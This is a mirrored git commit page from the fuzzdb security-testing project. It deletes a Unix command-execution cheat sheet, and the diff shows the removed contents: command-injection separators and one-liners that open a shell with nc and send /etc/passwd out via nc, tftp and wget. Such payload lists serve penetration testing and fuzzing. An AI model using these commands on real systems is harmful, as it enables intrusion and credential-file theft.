mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 05:24:12 +00:00
Delete command-execution-cheatsheat-unix.txt
This commit is contained in:
parent
71407d12e0
commit
6e3e71822b
1 changed files with 0 additions and 41 deletions
|
@ -1,41 +0,0 @@
|
|||
Executing Commands
|
||||
|
||||
Seperating Commands:
|
||||
blah;blah2
|
||||
|
||||
PIPEZ:
|
||||
blah ^ blah2
|
||||
|
||||
AND:
|
||||
blah && blah2
|
||||
|
||||
OR:
|
||||
FAIL || X
|
||||
|
||||
OR:
|
||||
blah%0Dblah2%0Dblah3
|
||||
|
||||
Backtick:
|
||||
`blah`
|
||||
|
||||
Background:
|
||||
`blah & blah2`
|
||||
|
||||
|
||||
|
||||
Getting Files / Data
|
||||
|
||||
FTP:
|
||||
Make a new text file, and echo and then redirect to FTP
|
||||
|
||||
NC:
|
||||
nc -e /bin/sh
|
||||
|
||||
NC:
|
||||
echo /etc/passwd | nc host port
|
||||
|
||||
TFTP:
|
||||
echo put /etc/passwd | tftp host
|
||||
|
||||
WGET:
|
||||
wget --post-file /etc/passwd
|
Loading…
Reference in a new issue